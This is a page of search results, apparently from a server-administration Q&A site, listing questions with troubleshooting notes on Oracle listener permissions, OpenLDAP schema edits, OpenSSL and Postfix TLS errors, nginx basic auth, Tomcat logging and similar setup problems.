Search Results

Search found 14546 results on 582 pages for 'mod authz host'.


  • Starting Oracle 10g on Ubuntu: listener fails to start

    - by tsegay
    I have installed Oracle 10g on Ubuntu 10.x; this is my first installation. After installing, I tried to start the listener with the command below:

        tsegay@server-name:/u01/app/oracle/product/10.2.0/db_1/bin$ lsnrctl
        LSNRCTL for Linux: Version 10.2.0.1.0 - Production on 29-DEC-2010 22:46:51
        Copyright (c) 1991, 2005, Oracle. All rights reserved.
        Welcome to LSNRCTL, type "help" for information.
        LSNRCTL> start
        Starting /u01/app/oracle/product/10.2.0/db_1/bin/tnslsnr: please wait...
        TNSLSNR for Linux: Version 10.2.0.1.0 - Production
        System parameter file is /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
        Log messages written to /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
        Error listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC1)))
        TNS-12555: TNS:permission denied
        TNS-12560: TNS:protocol adapter error
        TNS-00525: Insufficient privilege for operation
        Linux Error: 1: Operation not permitted
        Listener failed to start. See the error message(s) above...

    My listener.ora file looks like this:

        # listener.ora Network Configuration File: /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
        # Generated by Oracle configuration tools.
        SID_LIST_LISTENER =
          (SID_LIST =
            (SID_DESC =
              (SID_NAME = PLSExtProc)
              (ORACLE_HOME = /u01/app/oracle/product/10.2.0/db_1)
              (PROGRAM = extproc)
            )
          )
        LISTENER =
          (DESCRIPTION_LIST =
            (DESCRIPTION =
              (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1))
              (ADDRESS = (PROTOCOL = TCP)(HOST = acct-vmserver)(PORT = 1521))
            )
          )

    I can guess the problem is a permission issue, but I don't know where I need to change permissions. Any help is appreciated.

    EDIT: When I run the command with sudo, I get this:

        tsegay@server-name:/u01/app/oracle/product/10.2.0/db_1$ sudo ./bin/lsnrctl start
        LSNRCTL for Linux: Version 10.2.0.1.0 - Production on 30-DEC-2010 01:01:03
        Copyright (c) 1991, 2005, Oracle. All rights reserved.
        Starting ./bin/tnslsnr: please wait...
        ./bin/tnslsnr: error while loading shared libraries: libclntsh.so.10.1: cannot open shared object file: No such file or directory
        TNS-12547: TNS:lost contact
        TNS-12560: TNS:protocol adapter error
        TNS-00517: Lost contact
        Linux Error: 32: Broken pipe
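
    The TNS-12555/Linux Error 1 pair points at files the listener cannot touch rather than at listener.ora itself. A minimal sketch of things worth checking, assuming the standard oracle:dba ownership (the paths come from the question; everything else is an assumption):

        # remove stale IPC socket files, possibly left root-owned by an earlier sudo run
        sudo rm -rf /var/tmp/.oracle /tmp/.oracle
        # make sure the Oracle tree belongs to the oracle software owner
        sudo chown -R oracle:dba /u01/app/oracle
        # start the listener as oracle with its environment set, not via sudo
        su - oracle -c 'export ORACLE_HOME=/u01/app/oracle/product/10.2.0/db_1; \
          export LD_LIBRARY_PATH=$ORACLE_HOME/lib; $ORACLE_HOME/bin/lsnrctl start'

    The libclntsh.so.10.1 failure in the EDIT fits the same picture: sudo strips ORACLE_HOME and LD_LIBRARY_PATH from the environment, so the listener should be run as the oracle user with both variables set rather than as root.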


  • Removing/modifying LDAP objectclasses/attributes using olc

    - by Foezjie
    I'm having trouble using OpenLDAP's olc to modify a schema without shutting down the server. To test some things out, I made the following schema:

        objectIdentifier tests orgUlyssisOID:4
        objectIdentifier testAttribute tests:1
        objectIdentifier testObjectClass tests:2
        attributeType ( testAttribute:1 NAME 'attr1' DESC 'attribuut 1' SYNTAX '1.3.6.1.4.1.1466.115.121.1.40' )
        attributeType ( testAttribute:2 NAME 'attr2' DESC 'attribuut 2' SUP userPassword SINGLE-VALUE )
        objectclass ( testObjectClass:1 NAME 'class1' DESC 'objectclass 1' SUP top STRUCTURAL MUST ( attr1 $ attr2 ) )

    and added it to a new schema called test (cn={9}test.ldif in cn=schema). Now I can't seem to figure out how to delete class1 from that schema. I use the following LDIF (and have tried lots of variations, to no avail):

        dn : cn={9}test,cn=schema,cn=config
        changetype: modify
        delete: olcObjectClasses
        olcObjectClasses: ( testObjectClass:1 NAME 'class1' DESC 'objectclass 1' SUP top STRUCTURAL MUST ( attr1 $ attr2 ) )

    Running ldapmodify -x -W -D cn=admin,cn=config -f test.ldif -d 0 gives no output. -d 1 gives this:

        ldap_create
        ldap_sasl_bind
        ldap_send_initial_request
        ldap_new_connection 1 1 0
        ldap_int_open_connection
        ldap_connect_to_host: TCP localhost:389
        ldap_new_socket: 4
        ldap_prepare_socket: 4
        ldap_connect_to_host: Trying 127.0.0.1:389
        ldap_pvt_connect: fd: 4 tm: -1 async: 0
        ldap_open_defconn: successful
        ldap_send_server_request
        ber_scanf fmt ({it) ber:
        ber_scanf fmt ({i) ber:
        ber_flush2: 38 bytes to sd 4
        ldap_result ld 0x7f2a8ccf3430 msgid 1
        wait4msg ld 0x7f2a8ccf3430 msgid 1 (infinite timeout)
        wait4msg continue ld 0x7f2a8ccf3430 msgid 1 all 1
        ** ld 0x7f2a8ccf3430 Connections:
        * host: localhost port: 389 (default) refcnt: 2 status: Connected
        last used: Mon Sep 10 11:29:57 2012
        ** ld 0x7f2a8ccf3430 Outstanding Requests:
        * msgid 1, origid 1, status InProgress
        outstanding referrals 0, parent count 0
        ld 0x7f2a8ccf3430 request count 1 (abandoned 0)
        ** ld 0x7f2a8ccf3430 Response Queue: Empty
        ld 0x7f2a8ccf3430 response count 0
        ldap_chkResponseList ld 0x7f2a8ccf3430 msgid 1 all 1
        ldap_chkResponseList returns ld 0x7f2a8ccf3430 NULL
        ldap_int_select
        read1msg: ld 0x7f2a8ccf3430 msgid 1 all 1
        ber_get_next
        ber_get_next: tag 0x30 len 12 contents:
        read1msg: ld 0x7f2a8ccf3430 msgid 1 message type bind
        ber_scanf fmt ({eAA) ber:
        read1msg: ld 0x7f2a8ccf3430 0 new referrals
        read1msg: mark request completed, ld 0x7f2a8ccf3430 msgid 1
        request done: ld 0x7f2a8ccf3430 msgid 1
        res_errno: 0, res_error: <>, res_matched: <>
        ldap_free_request (origid 1, msgid 1)
        ldap_parse_result
        ber_scanf fmt ({iAA) ber:
        ber_scanf fmt (}) ber:
        ldap_msgfree
        ldap_free_connection 1 1
        ldap_send_unbind
        ber_flush2: 7 bytes to sd 4
        ldap_free_connection: actually freed

    So no real indication of an error. Where am I going wrong?

    Bonus question: if I have some entries of a certain objectclass, can I modify it (add/remove attributeTypes) without removing the entries? Thanks in advance for any help.
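
    One detail worth ruling out first (an assumption, since the -d 1 trace only shows a successful bind and unbind, never a modify): LDIF does not allow whitespace between an attribute name and its colon, so the leading line dn : cn={9}test,... may cause the whole change record to be skipped silently. A minimal sketch of the delete with strict LDIF:

        dn: cn={9}test,cn=schema,cn=config
        changetype: modify
        delete: olcObjectClasses
        olcObjectClasses: ( testObjectClass:1 NAME 'class1' DESC 'objectclass 1' SUP top STRUCTURAL MUST ( attr1 $ attr2 ) )

    Deletes under cn=config must also match the stored value exactly as slapd normalized it; comparing against

        ldapsearch -LLL -x -W -D cn=admin,cn=config -b cn={9}test,cn=schema,cn=config olcObjectClasses

    shows the canonical form to paste into the delete. On the bonus question: attributes can generally be added to an objectClass in place, but removing a MUST attribute while entries still carry it leaves those entries in violation of the schema, so they need adjusting first (a general OpenLDAP constraint, not specific to olc).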


  • IPv6 working fine, IPv4 throws OpenSSL error

    - by jippie
    I am building a webserver ( http://blog.linformatronics.nl/ ) which works just fine over both IPv4 and IPv6 when using a non-SSL connection. However, when I connect to it through https, IPv6 works as expected but an IPv4 connection throws a client-side error. Server-side logs are empty for the IPv4/https connection. Summarized in a table:

             | http  | https
        -----+-------+-------------------------------------------------------
        IPv4 | works | OpenSSL error, failed. No server side logging.
        -----+-------+-------------------------------------------------------
        IPv6 | works | self signed certificate warning, but works as expected

    Apparently the SSL tunnel isn't even set up, which accounts for the Apache logs being empty. But why does it work fine over IPv6 and fail over IPv4? My question is: why is this OpenSSL error thrown, and how can I solve it? Below is some extra information about the setup.

    IPv6 https. Command used to reproduce the IPv6/https behaviour:

        $ wget --no-check-certificate -O /dev/null -6 https://blog.linformatronics.nl
        --2012-11-03 15:46:48-- https://blog.linformatronics.nl/
        Resolving blog.linformatronics.nl (blog.linformatronics.nl)... 2001:980:1b7f:1:a00:27ff:fea6:a2e7
        Connecting to blog.linformatronics.nl (blog.linformatronics.nl)|2001:980:1b7f:1:a00:27ff:fea6:a2e7|:443... connected.
        WARNING: cannot verify blog.linformatronics.nl's certificate, issued by `/CN=localhost':
        Self-signed certificate encountered.
        WARNING: certificate common name `localhost' doesn't match requested host name `blog.linformatronics.nl'.
        HTTP request sent, awaiting response... 200 OK
        Length: 4556 (4.4K) [text/html]
        Saving to: `/dev/null'
        100%[=======================================================================>] 4,556 --.-K/s in 0s
        2012-11-03 15:46:49 (62.5 MB/s) - `/dev/null' saved [4556/4556]

    IPv4 https. Command used to reproduce the IPv4/https behaviour:

        $ wget --no-check-certificate -O /dev/null -4 https://blog.linformatronics.nl
        --2012-11-03 15:47:28-- https://blog.linformatronics.nl/
        Resolving blog.linformatronics.nl (blog.linformatronics.nl)... 82.95.251.247
        Connecting to blog.linformatronics.nl (blog.linformatronics.nl)|82.95.251.247|:443... connected.
        OpenSSL: error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
        Unable to establish SSL connection.

    Notes: I am on Ubuntu Server 12.04.1 LTS.
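
    The error string itself narrows things down: SSL23_GET_SERVER_HELLO:unknown protocol means the client received something that was not TLS at all on port 443, which fits a plain-HTTP service answering there on the IPv4 path (for instance a NAT port-forward in front of the server pointing 443 at the wrong internal port; that the v4 path has such a front-end is an assumption). A sketch of how to verify:

        # talk TLS directly to the IPv4 address; garbage instead of a certificate
        # confirms a non-TLS service answered on 443
        openssl s_client -connect 82.95.251.247:443
        # on the server itself, confirm Apache is bound to 443 for v4 as well as v6
        sudo netstat -tlnp | grep ':443'

    If the IPv4 dialogue shows an HTTP response instead of a certificate chain, the fix lives in whatever forwards IPv4 traffic to the box, not in Apache or OpenSSL.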


  • "Open with" prompt appears whenever a scheduled task runs

    - by Shashwat Tripathi
    I am trying to run a .vbs file every five minutes using the Windows Task Scheduler. In the Actions tab (New Action) I select the file ("D:\Documents\FC3 Savegames\FC3.vbs") using the open-file dialog, and I have made all the other settings properly. But whenever the task begins, it opens the "Open with" dialog. Once I chose Notepad in that dialog; another dialog then opened from Notepad saying it cannot find the file D:\Documents\FC3.txt and asking "Do you want to create a new file?" with three buttons: Yes, No and Cancel. Help me figure out what is wrong. I suspect the whitespace in the file path is causing the problem.

    Added later: I just worked around this by shortening the path to 8.3 form ("D:\Documents\FC3Sav~1\FC3.vbs"). But it still opens the "Open with" dialog every time; now it offers two main options, "Keep using Microsoft Windows Script Host" and "Other Program". This dialog does not open when I run the .vbs file directly.
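
    A sketch of the usual fix, assuming the stock Windows Script Host location: instead of making the script itself the action's program, run the interpreter and hand it the script as a quoted argument, which sidesteps both the file-association lookup and the whitespace problem.

        Program/script:  C:\Windows\System32\wscript.exe
        Add arguments:   "D:\Documents\FC3 Savegames\FC3.vbs"

    Use cscript.exe instead of wscript.exe if the script should run without GUI output.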


  • How do I install mod_dav_svn module on an Apache / MAMP server?

    - by fettereddingoskidney
    How do I install additional modules into my server configuration? Currently all of the other modules are installed in /Applications/MAMP/Library/modules, and I see that they are mod_*.so files, but I cannot seem to get mine to end up there.

    I am trying to set up an SVN repository and use my Apache (MAMP) server to serve it. I am using the Subversion installation that came pre-installed with Mac OS X 10.5. The repository is working, but I cannot access it remotely through my MAMP server using a client program (Dreamweaver CS5). When I try, I get an error from Dreamweaver saying:

        Cannot connect to host xxx: Connection refused.

    This, I believe, is because I have not properly configured my Apache server to serve the SVN repository. So I added the following lines to my httpd.conf file:

        <Location /subversion>
          DAV svn
          SVNPath /Applications/MAMP/htdocs/svn/
          AuthType Basic
          AuthName "Subversion repository"
          AuthUserFile /applications/mamp/htdocs/.htpasswd
          Require ServerAdmin
        </Location>

    and restarted the server with the command

        $ /Applications/MAMP/Library/bin/apachectl -k restart

    (I used this path because the default apachectl path is /usr/sbin/apachectl, the pre-installed command on Mac OS X, since the OS ships with a built-in Apache server.) I then get the error:

        Syntax error on line 1153 of /Applications/MAMP/conf/apache/httpd.conf: Unknown DAV provider: svn

    I checked the upper portion of httpd.conf and see that dav_module (mod_dav.so) is loaded and is in fact in the modules directory of my server. However, mod_dav_svn is neither installed in that directory nor listed in the LoadModule section of httpd.conf. So I need to install it, right? I have tried installing modules into my MAMP server before but was never successful, because I don't know how to do it. Can someone please walk me through installing that module? Thanks for your time!
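
    A sketch of one way to get mod_dav_svn built for MAMP, assuming a Subversion source tree matching the installed version and MAMP's bundled apxs (the paths below are assumptions):

        # build the Apache modules against MAMP's Apache
        cd subversion-1.x.y
        ./configure --with-apxs=/Applications/MAMP/Library/bin/apxs
        make && sudo make install
        # the build drops mod_dav_svn.so and mod_authz_svn.so into MAMP's modules
        # directory; then load them in httpd.conf before the <Location> block:
        LoadModule dav_svn_module    modules/mod_dav_svn.so
        LoadModule authz_svn_module  modules/mod_authz_svn.so

    One more thing worth checking once the module loads: Require ServerAdmin is not a standard Apache directive, so the auth section will likely need Require valid-user instead.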


  • Change the order of IP addresses returned by ifconfig?

    - by erikcw
    I have an Ubuntu server with several IP addresses attached to it; 127.0.0.1 is listed as venet0 by ifconfig. I'm using Chef to configure the server. The problem is that Chef lists 127.0.0.1 as the IP address of the server instead of one of the server's "real" IPs (apparently ohai's ipaddress uses the first IP listed by ifconfig to determine the server's IP). How can I change the order so the server's main IP is listed first instead of 127.0.0.1? Can venet0 be deleted and venet0:0 be "promoted" to take its place, since 127.0.0.1 is already listed on the lo interface?

        lo        Link encap:Local Loopback
                  inet addr:127.0.0.1 Mask:255.0.0.0
                  inet6 addr: ::1/128 Scope:Host
                  UP LOOPBACK RUNNING MTU:16436 Metric:1
                  RX packets:334 errors:0 dropped:0 overruns:0 frame:0
                  TX packets:334 errors:0 dropped:0 overruns:0 carrier:0
                  collisions:0 txqueuelen:0
                  RX bytes:16700 (16.7 KB) TX bytes:16700 (16.7 KB)

        venet0    Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
                  inet addr:127.0.0.1 P-t-P:127.0.0.1 Bcast:0.0.0.0 Mask:255.255.255.255
                  UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
                  RX packets:7622207 errors:0 dropped:0 overruns:0 frame:0
                  TX packets:8183436 errors:0 dropped:1 overruns:0 carrier:0
                  collisions:0 txqueuelen:0
                  RX bytes:2102750761 (2.1 GB) TX bytes:2795213667 (2.7 GB)

        venet0:0  Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
                  inet addr:XXX.XXX.XXX.XX1 P-t-P:XXX.XXX.XXX.XX1 Bcast:0.0.0.0 Mask:255.255.255.255
                  UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1

        venet0:1  Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
                  inet addr:XXX.XXX.XXX.XX2 P-t-P:XXX.XXX.XXX.XX2 Bcast:0.0.0.0 Mask:255.255.255.255
                  UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1

    route -n:

        Kernel IP routing table
        Destination     Gateway         Genmask         Flags Metric Ref  Use Iface
        192.0.2.1       0.0.0.0         255.255.255.255 UH    0      0      0 venet0
        0.0.0.0         192.0.2.1       0.0.0.0         UG    0      0      0 venet0
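
    This looks like an OpenVZ container, where venet0 always carries 127.0.0.1 and the public addresses live on its aliases; venet0 cannot safely be deleted, and an alias cannot be promoted, since venet0:0 is only a label on the same device. A sketch of a Chef-side workaround instead, assuming ohai's derived attribute can simply be pinned per node (the attribute mechanism here is an assumption based on 2012-era Chef):

        # inspect what ohai currently reports
        ohai ipaddress
        # then pin the address via the node's attributes, e.g. in a role:
        #   "override_attributes": { "ipaddress": "XXX.XXX.XXX.XX1" }

    Overriding the attribute leaves the interfaces exactly as OpenVZ set them up, which is safer than editing venet devices from inside the container.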


  • Win 2003 SBS - secure enough by default?

    - by Pekka
    I have to set up a Windows 2003 Small Business Server to work as a Subversion repository and possibly as an e-mail server later. The machine is a virtual one, hosted with a hosting company, and freshly initialized. I used the Security Configuration Wizard to deactivate all server roles. After I install Subversion, I will open the necessary ports for the service; in addition, obviously, RDP will stay open so I can remote-control the machine. Automatic updates are activated, and I will set up e-mail notification every time somebody logs on to the server. I'm a programmer, not a professional systems administrator, so I would like to know whether you would regard this as a sane and secure setup for a (publicly available) box hosting sensitive code and/or e-mail. Is there anything additional I should do to make the machine secure? Is there anything I can do on a long-term basis to keep it secure, apart from monitoring the event log (as far as I can make sense of it) and seeing that hotfixes are installed promptly?


  • How to turn off Tomcat logging in Eclipse?

    - by kirdie
    I develop a Vaadin project in Eclipse that I run on Tomcat 6, which is started directly by Eclipse. Tomcat prints an enormous number of log messages on each start, however, which makes it hard to see the output of my own application. I have already replaced all log levels in tomcat6/conf/logging.properties with WARNING (e.g. java.util.logging.ConsoleHandler.level = WARNING), but I still get many INFO messages. How can I turn this off or restrict the log messages to WARNING? An example of the messages:

        Okt 26, 2012 12:16:36 PM org.apache.catalina.core.AprLifecycleListener init
        INFO: Loaded APR based Apache Tomcat Native library 1.1.24.
        Okt 26, 2012 12:16:36 PM org.apache.catalina.core.AprLifecycleListener init
        INFO: APR capabilities: IPv6 [true], sendfile [true], accept filters [false], random [true].
        Okt 26, 2012 12:16:36 PM org.apache.tomcat.util.digester.SetPropertiesRule begin
        WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Context} Setting property 'source' to 'org.eclipse.jst.j2ee.server:saim' did not find a matching property.
        Okt 26, 2012 12:16:37 PM org.apache.coyote.http11.Http11AprProtocol init
        INFO: Initializing Coyote HTTP/1.1 on http-8080
        Okt 26, 2012 12:16:37 PM org.apache.coyote.ajp.AjpAprProtocol init
        INFO: Initializing Coyote AJP/1.3 on ajp-8009
        Okt 26, 2012 12:16:37 PM org.apache.catalina.startup.Catalina load
        INFO: Initialization processed in 879 ms
        Okt 26, 2012 12:16:37 PM org.apache.catalina.core.StandardService start
        INFO: Starting service Catalina
        Okt 26, 2012 12:16:37 PM org.apache.catalina.core.StandardEngine start
        INFO: Starting Servlet Engine: Apache Tomcat/6.0.32
        Okt 26, 2012 12:16:37 PM org.apache.coyote.http11.Http11AprProtocol start
        INFO: Starting Coyote HTTP/1.1 on http-8080
        Okt 26, 2012 12:16:37 PM org.apache.coyote.ajp.AjpAprProtocol start
        INFO: Starting Coyote AJP/1.3 on ajp-8009
        Okt 26, 2012 12:16:37 PM org.apache.catalina.startup.Catalina start
        INFO: Server startup in 568 ms
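
    A sketch of the probable missing piece, assuming the WTP server adapter Eclipse uses for Tomcat: a Tomcat launched from Eclipse does not read tomcat6/conf/logging.properties unless told to, so edits there never take effect. In the server's launch configuration (double-click the server in the Servers view, then "Open launch configuration", Arguments tab) add these VM arguments:

        -Djava.util.logging.config.file=/path/to/tomcat6/conf/logging.properties
        -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager

    Without them, java.util.logging falls back to the JRE's own logging.properties, whose default console level is INFO, which matches the behaviour described.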


  • Postfix: enabling SSL on port 465 fails

    - by user221290
    I have installed Postfix and enabled SSL/TLS. I just tested it: I can send email via ports 25 and 587, but cannot send email via port 465. The log is:

        May 26 17:24:06 mail postfix/smtpd[28721]: SSL_accept:SSLv3 write server hello A
        May 26 17:24:06 mail postfix/smtpd[28721]: SSL_accept:SSLv3 write certificate A
        May 26 17:24:06 mail postfix/smtpd[28721]: SSL_accept:SSLv3 write server done A
        May 26 17:24:06 mail postfix/smtpd[28721]: SSL_accept:SSLv3 flush data
        May 26 17:24:06 mail postfix/smtpd[28721]: SSL3 alert read:fatal:certificate unknown
        May 26 17:24:06 mail postfix/smtpd[28721]: SSL_accept:failed in SSLv3 read client certificate A
        May 26 17:24:06 mail postfix/smtpd[28721]: SSL_accept error from unknown[10.155.36.240]: 0
        May 26 17:24:06 mail postfix/smtpd[28721]: warning: TLS library problem: 28721:error:14094416:SSL routines:SSL3_READ_BYTES:sslv3 alert certificate unknown:s3_pkt.c:1197:SSL alert number 46:
        May 26 17:24:06 mail postfix/smtpd[28721]: lost connection after CONNECT from unknown[10.155.36.240]
        May 26 17:24:06 mail postfix/smtpd[28721]: disconnect from unknown[10.155.36.240]

    My email server is 10.155.34.117 and the email client is 10.155.36.240. The client error is:

        Could not connect to SMTP host: 10.155.34.117, port: 465.

    My master.cf:

        smtps     inet  n       -       n       -       -       smtpd
          -o smtpd_tls_wrappermode=yes

    My main.cf:

        smtpd_use_tls = yes
        smtpd_tls_auth_only = no
        smtpd_tls_key_file = /etc/pki/myca/mail.key
        smtpd_tls_cert_file = /etc/pki/myca/mail.crt
        smtpd_tls_CAfile = /etc/pki/myca/cacert_new.pem
        smtpd_tls_loglevel = 2
        smtpd_tls_received_header = yes
        smtpd_tls_session_cache_timeout = 3600s
        smtpd_tls_session_cache_database = btree:/etc/postfix/smtpd_scache

    It seems to be a certificate issue, but I have tried granting access to the file many times... I have no idea on this, please help!
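
    Reading the alert direction helps here: "SSL3 alert read:fatal:certificate unknown" means Postfix received the alert, i.e. the client rejected the server's certificate and hung up; the TLS setup on 465 is otherwise completing the server side of the handshake. A sketch of how to confirm, using the CA file from main.cf:

        # handshake on the wrapper-mode port, verifying against your own CA
        openssl s_client -connect 10.155.34.117:465 -CAfile /etc/pki/myca/cacert_new.pem

    If s_client verifies the chain, the remaining work is on the client side: import cacert_new.pem into the mail client's trust store. The wording "Could not connect to SMTP host" suggests a Java client (an assumption), in which case the import would go into its JRE cacerts via keytool -importcert.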


  • How to create domain or router-level workgroup (dd-wrt micro)

    - by Anthony
    In Windows, is Active Directory required to use a "Domain" instead of a "Workgroup"? Do I need to register a domain with a DNS provider like GoDaddy? What I really want to do is set up my home LAN so that everyone connecting to the main router (which is everyone, about 30 people) can see each other. I've tried having everyone use the same workgroup name; it's still hit or miss. I tried setting the domain name and host name on the router itself; still nothing. I've tried joining the domain name I set instead of the workgroup, and I get an AD error. But ideally, everyone who is connected to the main router should simply see each other and any shared folders. I've had this problem on other large LANs where I was not the network admin, and I've never been able to figure out why people sometimes disappear or never see each other. I'd really prefer using the native sharing functionality in the OS to setting up an internal FTP or Samba server, etc. Any sure-fire ways to fix this? (Maybe an open source clone of AD?) Thanks!


  • What is the ideal way to set up multiple FTP enabled web accounts on Fedora?

    - by Nicholas Flynt
    I'm setting up a test server for use as a web development platform, and I'd like to mimic as closely as I can a typical shared hosting setup. That is, I'd like my server to have multiple user FTP accounts, each of which links to a directory containing the webroot of a site, and I'd like Apache to be able to easily see and manipulate these files.

    I'll admit I'm not as familiar with Fedora as I'd like (I run Ubuntu on my home box), and SELinux is giving me some grief. My initial plan was to have each user FTP into their home directory and put the web directory there as well, but SELinux throws a hissy fit when Apache tries to access anything outside of its web directory, so that plan was a no-go. Would it be wise to continue down this route, perhaps mounting the web directories into the user home folders so that FTP could still be used to access them, even though Apache sees them in /var/www as it expects? Would it make more sense to set up custom FTP accounts and use a single FTP user on the server box? What's the general course of action on something like this?

    I'm using vsftpd right now to host the web directories, which is why I like the home-directory approach (it's simple and secure), but of course there's bound to be a better way to go about it. Thanks. (I'll leave other things, like restricted DB access, to another post. Right now I'm interested in just getting FTP and Apache to play nice in a multi-user environment.)

    PS: For the record, an issue I ran into when doing all of this was that if Apache isn't running as the same user that FTP saves files as, there are permission errors when FTP creates files, requiring the remote user to chmod the files to fix it. A logical fix would be to run Apache in a special group, put all web users in this group, and have FTP default to giving this group read/write access to everything, as Apache would expect, but I never could figure out how to accomplish this. Bonus points and cake if you know a solution.
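
    A sketch of the group-based layout from the postscript, assuming Fedora's stock apache user and vsftpd (group names and paths are assumptions):

        # shared group for web content
        groupadd webdev
        usermod -aG webdev apache
        usermod -aG webdev alice                # repeat per FTP user
        mkdir -p /var/www/sites/alice
        chown alice:webdev /var/www/sites/alice
        chmod 2775 /var/www/sites/alice         # setgid: new files inherit the group
        # SELinux: label the tree for httpd and let vsftpd write to it
        semanage fcontext -a -t httpd_sys_content_t "/var/www/sites(/.*)?"
        restorecon -R /var/www/sites
        setsebool -P allow_ftpd_full_access on

    Combined with local_umask=002 in vsftpd.conf, the setgid bit gives the Apache group read/write on whatever FTP creates, which covers the chmod complaint at the end.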


  • EngineX ignores Auth Basic?

    - by Miko
    I have configured nginx to password-protect a directory using auth_basic. The password prompt comes up and the login works fine. However, if I refuse to type in my credentials and instead hit Escape multiple times in a row, the page will eventually load without CSS and images. In other words, continuously telling the login prompt to go away will at some point let the page load anyway. Is this an issue with nginx, or with my configuration? Here is my virtual host:

        server {
            server_name sub.domain.com;
            root /www/sub.domain.com/;

            location / {
                index index.php index.html;
                root /www/sub.domain.com;
                auth_basic "Restricted";
                auth_basic_user_file /www/auth/sub.domain.com;
                error_page 404 = /www/404.php;
            }

            location ~ \.php$ {
                include /usr/local/nginx/conf/fastcgi_params;
            }
        }

    My server runs CentOS + nginx + php-fpm + xcache + MySQL.
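
    A sketch of the likely explanation, inferred from the config above: for any URL ending in .php the regex location wins over location /, and that block carries no auth_basic of its own, so the HTML itself is served unauthenticated while the CSS and images (matched by location /) stay protected. That is exactly a page "without CSS and images" once the prompts are dismissed. Lifting the auth to server level closes the gap, since server-level directives are inherited by both locations:

        server {
            server_name sub.domain.com;
            root /www/sub.domain.com;
            auth_basic "Restricted";
            auth_basic_user_file /www/auth/sub.domain.com;
            # other directives (index, error_page) as before

            location / {
                index index.php index.html;
            }

            location ~ \.php$ {
                include /usr/local/nginx/conf/fastcgi_params;
            }
        }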


  • SSL connections hang at client hello (curl, openssl client, apt-get, wget, everything)

    - by Niklas B
    Hi, I've run into a problem on my Debian VPS (a Xen domU) regarding SSL: almost all SSL connections hang at the client hello. For example:

        # curl -vI https://graph.facebook.com
        About to connect() to graph.facebook.com port 443 (#0)
        Trying 66.220.146.48... connected
        Connected to graph.facebook.com (66.220.146.48) port 443 (#0)
        successfully set certificate verify locations:
        CAfile: none
        CApath: /etc/ssl/certs
        SSLv3, TLS handshake, Client hello (1):

    It's the same when using the openssl client. However, some SSL traffic works (for example https://www.nordea.se).

    Server:

        # uname -a
        Linux server.com 2.6.26-1-xen-amd64 #1 SMP Fri Mar 13 21:39:38 UTC 2009 x86_64 GNU/Linux

    Everything does, however, work on my dom0 (the main Xen host).

    Apt-get: I can't even run apt-get update with the Debian security sources (it hangs on reading headers).

    OpenSSL: at the beginning I thought I had an old OpenSSL client (0.9.8o-4), since I appeared to have a newer one on the dom0 (0.9.8g-15+lenny8), but manually updating the openssl deb didn't help.

    OpenSSL client: this is the full output of when the openssl client hangs: http://pastebin.com/PAjwMap9

    Closing thoughts: I've Googled the crap out of this and I'm not getting any further. I've seen problems with curl, apt-get etc., but they were all specific to the application in question, not general to the system. Any thoughts?
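
    The pattern (small exchanges work, handshakes that involve full-size packets stall, and the dom0 is fine) matches two classic Xen domU problems rather than anything in OpenSSL: checksum/segmentation offload trouble on the virtual NIC, or a path MTU issue. That diagnosis is an assumption, but both are cheap to test:

        # inspect current offload settings on the domU interface
        ethtool -k eth0
        # turn off TX checksumming and segmentation offload as a test
        ethtool -K eth0 tx off
        ethtool -K eth0 tso off
        # separately, test whether a smaller MTU unsticks the handshake
        ip link set eth0 mtu 1400

    If one of these cures it, make the setting persistent, e.g. with an up-line in /etc/network/interfaces (Debian ifupdown):

        iface eth0 inet dhcp
            up ethtool -K eth0 tx off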


  • CentOS/Postfix able to send mail but not receive it

    - by Dan Hastings
    I have set up Postfix and used the mail command to test it, and an email was successfully sent and delivered: it arrived in my Yahoo inbox. BUT the sender also received an email in the Maildir directory saying "I'm sorry to have to inform you that your message could not be delivered to one or more recipients", even though the message was delivered. I tried replying from Yahoo to the email, but the reply never arrived. I added one MX record at GoDaddy last week:

        Priority: 0    Host: @    Points to: mail.domain.com    TTL: 1 Hour

    Postfix's main.cf has the following added to it:

        myhostname = mail.domain.com
        mydomain = domain.com
        myorigin = $mydomain
        inet_interfaces = all
        mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain
        mynetworks = 192.168.0.0/24, 127.0.0.0/8
        relay_domains =
        home_mailbox = Maildir/

    I checked /var/log/maillog and found the following errors occurring:

        postfix/anvil[18714]: statistics: max connection rate 1/60s for (smtp:unknown) at Jun 3 09:30:15
        postfix/anvil[18714]: statistics: max connection count 1 for (smtp:unknown) at Jun 3 09:30:15
        postfix/anvil[18714]: statistics: max cache size 1 at Jun 3 09:30:15
        postfix/smtpd[18772]: connect from unknown[unknown]
        postfix/smtpd[18772]: lost connection after CONNECT from unknown[unknown]
        postfix/smtpd[18772]: disconnect from unknown[unknown]

    Output of postconf -n:

        alias_database = hash:/etc/aliases
        alias_maps = hash:/etc/aliases
        command_directory = /usr/sbin
        config_directory = /etc/postfix
        daemon_directory = /usr/libexec/postfix
        data_directory = /var/lib/postfix
        debug_peer_level = 2
        home_mailbox = Maildir/
        html_directory = no
        inet_interfaces = all
        inet_protocols = all
        mail_owner = postfix
        mailq_path = /usr/bin/mailq.postfix
        manpage_directory = /usr/share/man
        mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain
        mydomain = domain.com
        myhostname = mail.domain.com
        mynetworks = 168.100.189.0/28, 127.0.0.0/8
        myorigin = $mydomain
        newaliases_path = /usr/bin/newaliases.postfix
        queue_directory = /var/spool/postfix
        readme_directory = /usr/share/doc/postfix-2.6.6/README_FILES
        relay_domains =
        sample_directory = /usr/share/doc/postfix-2.6.6/samples
        sendmail_path = /usr/sbin/sendmail.postfix
        setgid_group = postdrop
        unknown_local_recipient_reject_code = 550
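
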